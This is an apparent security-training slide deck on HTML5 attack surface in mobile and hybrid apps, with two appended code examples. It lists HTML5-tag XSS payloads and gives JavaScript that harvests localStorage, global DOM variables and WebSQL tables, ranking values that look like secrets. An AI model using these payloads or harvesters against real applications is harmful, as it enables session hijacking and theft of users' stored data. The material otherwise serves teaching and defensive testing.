Html5 on mobile

  1. © Blueinfy Solutions HTML5 and Mobile
  2. What is HTML5
     • An enhancement of HTML 4.01: more tags, new JavaScript APIs, functionality aimed at mobile devices, and new types for existing tags
     • Old tags keep working
     • An existing application is switched to HTML5 parsing by changing its first line to “<!DOCTYPE html>”
  3. HTML5 in Mobile
     • It is changing the game: apps are migrating to HTML5 instead of native code
     • Web vs. Mobile: both can use HTML5, so there is no need to maintain several code bases; the client is HTML + CSS + JS only, talking to server-side services
  4. Technology Vectors
  5. What is running where? (architecture figure; only its labels survive extraction)
     • Layers: Presentation, Business, Data Access, Authentication, Communication, etc.
     • Runtime, platform and operating system components
     • Server-side and client-side (browser) components named in the figure: HTML5, DOM, XHR, WebSocket, Storage, WebSQL, Flash, Flex, AMF, Silverlight, WCF, XAML, .NET, JS
     • Mobile: Android, iPhone/iPad, other mobile platforms
  6. HTML5 in a nutshell - Specs
     Source: http://en.wikipedia.org/wiki/File:HTML5-APIs-and-related-technologies-by-Sergey-Mavrody.png
     Source: http://html5demos.com/
     • Evolution is ongoing in the Web Hypertext Application Technology Working Group (WHATWG)
  7. Key HTML5 features for Mobile
     • Offline web application support
     • Web Storage
     • Geolocation API
     • Canvas 2D drawing
     • Video and audio streaming support
  8. HTML5 features not supported on Mobile (as of this deck; current mobile browsers support most of them)
     • Microdata
     • 3D animation
     • FileReader API
     • IndexedDB
     • Web Workers
  9. Modern Browser Model (layered figure; only its labels survive extraction)
     • Presentation: HTML5 + CSS; plug-ins (Silverlight, Flash); API (Media, Geo etc.) & Messaging
     • Process & Logic: JavaScript, DOM/Events, Parser/Threads
     • Network & Access: XHR 1 & 2, WebSocket, plug-in sockets, browser-native network services
     • Core Policies: SOP/CORS/Content-Security sandbox
     • Storage: WebSQL, Mobile Cache, FileSystem
  10. Abusing HTML5 Tags
     • The new tags and attributes can be abused; filters and validators written for HTML 4 often do not know them
     • Media tags
       – <video poster=javascript:alert(document.cookie)//
       – <audio><source onerror="javascript:alert(document.cookie)">
     • Form tags
       – <form><button formaction="javascript:alert(document.cookie)">foo
       – <body oninput=alert(document.cookie)><input autofocus>
  11. Accessing media tags
  12. Moving/Touch
  13. Login cookie
  14. Profile
     • Fetched through Web Storage – the cookie is not needed…
  15. WebSQL data
     • Through JavaScript one can store information in a client-side database
     • Example
  16. One-time fetch
  17. Network calls
     • HTML5 adds WebSocket and XHR Level 2
     • XHR Level 2 can make cross-origin requests (subject to CORS); WebSocket opens a full-duplex channel to any host and port. Neither is a raw socket, but whether and how fast a connection attempt succeeds or fails still reveals whether a host/port is reachable
     • Both can be driven from a JavaScript payload
     • Malware or a worm can use them for intranet host and port scanning and for exfiltration from inside the browser
  18. Same Origin Policy (SOP)
     • The browser's sandbox: scheme (protocol), host and port must all match
     • A page in a child domain may set document.domain to its parent domain to share an origin with it; this only takes effect if both sides set it, and modern browsers deprecate it
     • document.domain cannot be relaxed to a public suffix such as a top-level domain (TLD), which keeps unrelated sites sandboxed from each other
  19. Fetching Location
  20. Location calls
  21. Hybrid App
     • Android
  22. Integrating native code with the WebView
     • Hook your handlers to make it hybrid
     • Interact with the WebView
  23. Set permissions
     • Manifest file
  24. Loading a Hybrid App
  25. Slidebar-type touch views
  26. HTML5 Attacks
  27. Modern Browser Model (same figure as slide 9; highlighted area: XSS with HTML5 tags, attributes and events)
     • Presentation: HTML5 + CSS; plug-ins (Silverlight, Flash); API (Media, Geo etc.) & Messaging
     • Process & Logic: JavaScript, DOM/Events, Parser/Threads
     • Network & Access: XHR 1 & 2, WebSocket, plug-in sockets, browser-native network services
     • Core Policies: SOP/CORS sandbox
     • Storage: WebSQL, Mobile Cache
  28. HTML5 – Tags/Attributes/Events
     • Tags – media (audio/video), canvas (getImageData), menu, embed, buttons/commands, form controls (keys)
     • Attributes – form, submit, autofocus, sandbox, manifest, rel etc.
     • Events/Objects – navigation (_self), editable content, Drag-Drop APIs, pushState (History) etc.
  29. XSS variants
     • Media tags, examples:
       – <video><source onerror="javascript:alert(1)">
       – <video onerror="javascript:alert(1)"><source>
  30. XSS variants
     • Exploiting autofocus (the onfocus handler fires without any user interaction)
       – <input autofocus onfocus=alert(1)>
       – <select autofocus onfocus=alert(1)>
       – <textarea autofocus onfocus=alert(1)>
       – <keygen autofocus onfocus=alert(1)> (the keygen element has since been removed from browsers)
  31. XSS variants
     • Form & button etc.
       – <form id="test" /><button form="test" formaction="javascript:alert(1)">test
       – <form><button formaction="javascript:alert(1)">test
     • Etc … and more …
       – A good HTML5 XSS cheat sheet: http://html5sec.org/
  32. Extraction through XSS
     • Once there is an entry point (an XSS), it is game over for everything the page can reach
  33. Modern Browser Model (same figure as slide 9; highlighted area: Web Storage and DOM information extraction)
     • Presentation: HTML5 + CSS; plug-ins (Silverlight, Flash); API (Media, Geo etc.) & Messaging
     • Process & Logic: JavaScript, DOM/Events, Parser/Threads
     • Network & Access: XHR 1 & 2, WebSocket, plug-in sockets, browser-native network services
     • Core Policies: SOP/CORS sandbox
     • Storage: WebSQL, Mobile Cache
  34. Web Storage Extraction
     • Before HTML5 the browser had one place to store data – the cookie (small, and replayed on every request)
     • HTML5 adds the Web Storage API (localStorage and sessionStorage)
     • It holds application data scoped to the origin, readable by every script running in that origin
     • http://www.w3.org/TR/webstorage/
  35. Web Storage Extraction
     • Anything in Web Storage is readable by JavaScript, so an XSS can steal it
     • Session hijacking: a session token kept in storage gets no protection from the HttpOnly cookie flag, which only shields cookies from script
     • getItem and setItem calls
     • XSS the box and scan through storage
  36. Blind storage enumeration
     if (localStorage.length) {
       console.log(localStorage.length);
       for (var i = 0; i < localStorage.length; i++) {
         var key = localStorage.key(i);   // enumerate stored keys only
         console.log(key);
         console.log(localStorage.getItem(key));
       }
     }
     • The code above dumps every stored key and value; key()/getItem() are used rather than for…in because for…in over localStorage also walks the Storage prototype (getItem, setItem, …)
  37. File System Storage
     • HTML5-era browsers offered a virtual file system through the FileSystem API
       window.requestFileSystem = window.requestFileSystem || window.webkitRequestFileSystem;
     • It becomes a full-blown local file system for the application, inside the origin sandbox
     • It empowers the application (note: this API only ever shipped in WebKit/Chromium behind the webkit prefix and was never standardised)
  38. File System Storage
     • It provides a temporary or a persistent file system
       var filesys;
       function init() {
         window.requestFileSystem(window.TEMPORARY, 1024 * 1024, function (filesystem) {
           filesys = filesystem;   // keep the handle for later reads and writes
         }, catcherror);
       }
       function catcherror(e) {
         console.log('requestFileSystem failed: ' + (e.name || e.code));
       }
     • The app can have a full file system in place now
  39. Sensitive information in the file system
     • Assuming the app is creating a profile on the local file system
  40. DOM Storage
     • Applications run with a “rich” DOM
     • JavaScript sets many variables and parameters while loading – GLOBALS
     • They hold sensitive information; what if they are GLOBAL and remain for the life of the application?
     • They can be retrieved with XSS
     • HTTP requests and responses go through JavaScript (XHR) – what about those variables?
  41. Blind Enumeration
     for (var i in window) {
       try {
         var obj = window[i];   // some window properties throw on access
         if (typeof obj == "string") {
           console.log(i);
           console.log(obj.toString());
         }
       } catch (ex) {}
     }
  42. Global Sensitive Information Extraction from DOM
     • HTML5 apps run on a single DOM
     • with several key global variables, objects and arrays, e.g.
       var arrayGlobals = ['my@email.com', "12141hewvsdr9321343423mjfdvint", "test.com"];
     • Post-DOM exploitation is possible, harvesting all these values
  43. Global Sensitive Information Extraction from DOM
     for (var i in window) {
       var obj = window[i];
       if (obj === null || obj === undefined) continue;   // skip empty slots
       var type = typeof obj;
       if (type == "object" || type == "string") {
         console.log("Name:" + i);
         try {
           var my = JSON.stringify(obj);   // throws on circular structures
           console.log(my);
         } catch (ex) {}
       }
     }
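Slides 41 to 43 stop at printing every global; an added example (not code from the Blueinfy deck) of the same walk carried one step further: serialise globals without crashing on circular structures, drop the host objects that serialise to nothing, and rank the entries whose contents look like secrets. The root object is window in a browser; the BUILTIN list is a hypothetical short version of the names a blank window already has, and the test drives it with a constructed object in place of window.

```javascript
// Added example (not from the Blueinfy deck): walk the global object the way a
// post-XSS payload would, serialise application state safely, and rank entries
// whose contents look like secrets. `root` is window in the browser.

// Properties a blank browser window already owns. Hypothetical short list; in
// practice snapshot Object.keys(window) on an empty page and diff against it.
const BUILTIN = new Set(['window', 'document', 'location', 'navigator', 'console']);

// JSON.stringify throws on circular structures (DOM nodes, app models with
// back-references); replace repeats with a marker instead of giving up.
function safeStringify(value) {
  const seen = new WeakSet();
  return JSON.stringify(value, (key, v) => {
    if (typeof v === 'object' && v !== null) {
      if (seen.has(v)) return '[circular]';
      seen.add(v);
    }
    return v;
  });
}

// Contents worth reading first: JWTs, 32+ hex digits (session ids, API keys),
// e-mail addresses.
const SECRET_RE = /eyJ[\w-]+\.[\w-]+\.[\w-]+|[A-Fa-f0-9]{32,}|[^@\s"]+@[^@\s"]+\.[a-z]{2,}/i;

// Return the app-defined globals as { name, type, text, secret }, secrets first.
// Only `var` globals and explicit window.x assignments show up here: top-level
// let/const bindings never become window properties.
function harvestGlobals(root, builtin = BUILTIN) {
  const found = [];
  for (const name of Object.keys(root)) {
    if (builtin.has(name)) continue;
    let obj;
    try { obj = root[name]; } catch { continue; }   // cross-origin getters throw
    if (obj === null || obj === undefined) continue;
    const type = typeof obj;
    if (type !== 'string' && type !== 'number' && type !== 'object') continue;
    let text;
    try { text = safeStringify(obj); } catch { continue; }
    if (text === undefined || text === '{}') continue;   // host objects serialise to nothing useful
    found.push({ name, type, text, secret: SECRET_RE.test(text) });
  }
  return found.sort((a, b) => Number(b.secret) - Number(a.secret));
}
```

The ranking regex is deliberately crude; its job is to put the handful of interesting globals at the top of a dump that, on a real single-page app, can run to hundreds of entries.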
  44. SQL Injection
     • WebSQL was drafted alongside HTML5 and gives the browser its own SQL database (SQLite). The W3C abandoned the spec and recent Chromium releases have removed the API, but deployed apps still use it
     • It allows one-time data loading and offline browsing
     • Data kept offline is a security concern and a potential injection point
     • executeSql(sql, args) binds parameters through ? placeholders; building the statement by string concatenation makes the local database injectable
  45. SQL Injection
     • Through JavaScript one can harvest the entire local database
     • Example
  46. Blind WebSQL Enumeration
     • To exploit we need
       – The Database object
       – The table structure created in SQLite
       – The user table against which to run the SELECT query
  47. Blind WebSQL Enumeration
     var dbo, table, usertable;
     for (var i in window) {
       var obj = window[i];
       try {
         if (obj.constructor.name == "Database") {
           dbo = obj;
           obj.transaction(function (tx) {
             // double quotes outside so the SQL's single quotes do not end the string
             tx.executeSql("SELECT name FROM sqlite_master WHERE type='table'", [],
               function (tx, results) {
                 table = results;
                 // the callback runs asynchronously, so pick the table here, not after the loop
                 if (table.rows.length > 1) usertable = table.rows.item(1).name;
               }, null);
           });
         }
       } catch (ex) {}
     }
  48. Blind WebSQL Enumeration
     • Run through all global objects and keep the one whose constructor is “Database”
     • Run a SELECT against sqlite_master to list the tables
     • Grab the first user table; the 0th entry is WebKit's own bookkeeping table
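The enumeration slides 46 to 48 describe, carried through to a full dump as an added example (not code from the Blueinfy deck): find every Database handle on the global object, list the tables from sqlite_master, skip WebKit's internal table by name rather than by position, and read every row of every user table in the right order, since executeSql delivers results asynchronously. In a browser the root object is window; the Database class below is a constructed mock of the openDatabase() handle so the example runs in Node, and the table contents in the test are constructed too.

```javascript
// Added example (not from the Blueinfy deck): locate WebSQL Database handles on
// the global object, list the user tables from sqlite_master and dump their
// rows. Real code would pass `window` as root; the Database class below is a
// constructed mock of the openDatabase() handle so the example runs in Node.

// Constructed mock: answers the two statement shapes the enumerator issues from
// an in-memory { tableName: [row, ...] } map, with the real callback signature
// executeSql(sql, args, onSuccess(tx, resultSet), onError(tx, error)).
class Database {
  constructor(tables) { this.tables = tables; }
  transaction(cb) {
    cb({ executeSql: (sql, args, onOk, onErr) => this._exec(sql, onOk, onErr) });
  }
  _exec(sql, onOk, onErr) {
    const rs = (rows) => ({ rows: { length: rows.length, item: (i) => rows[i] } });
    if (/^SELECT name FROM sqlite_master WHERE type='table'$/i.test(sql)) {
      onOk(this, rs(Object.keys(this.tables).map((name) => ({ name }))));
      return;
    }
    const m = /^SELECT \* FROM "([^"]+)"$/i.exec(sql);
    if (m && this.tables[m[1]]) onOk(this, rs(this.tables[m[1]]));
    else onErr(this, { message: 'no such table' });
  }
}

// WebKit keeps its own bookkeeping table in every database; skip it by name
// instead of assuming it is always entry 0.
const INTERNAL_TABLES = new Set(['__WebKitDatabaseInfoTable__']);

// Promise wrapper: executeSql is asynchronous, so results must be consumed in
// the callback (or awaited), never read right after the loop that issued them.
function query(db, sql) {
  return new Promise((resolve, reject) => {
    db.transaction((tx) => {
      tx.executeSql(sql, [],
        (_tx, rs) => {
          const rows = [];
          for (let i = 0; i < rs.rows.length; i++) rows.push(rs.rows.item(i));
          resolve(rows);
        },
        (_tx, err) => reject(new Error(err.message)));
    });
  });
}

// Every global whose constructor is named Database, as the deck's loop does,
// but tolerant of properties that throw on access.
function findDatabases(root) {
  const dbs = [];
  for (const name of Object.keys(root)) {
    let v;
    try { v = root[name]; } catch { continue; }
    if (v && typeof v === 'object' && v.constructor && v.constructor.name === 'Database') {
      dbs.push(v);
    }
  }
  return dbs;
}

// Dump all user tables of all databases: { tableName: [row, ...] }.
async function dumpWebSql(root) {
  const result = {};
  for (const db of findDatabases(root)) {
    const tables = await query(db, "SELECT name FROM sqlite_master WHERE type='table'");
    for (const { name } of tables) {
      if (INTERNAL_TABLES.has(name)) continue;
      // Names come from sqlite_master, not from user input, but they are still
      // quoted as identifiers so odd table names cannot break the statement.
      result[name] = await query(db, `SELECT * FROM "${name.replace(/"/g, '""')}"`);
    }
  }
  return result;
}
```

Two details matter more than the dump itself: the table list is filtered by name because a database created before WebKit added its bookkeeping table, or by a different engine, will not have it at index 0; and every executeSql result is consumed through the callback, since the deck's version reads table.rows before the transaction has run.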
  49. Blind WebSQL Enumeration
  50. Conclusion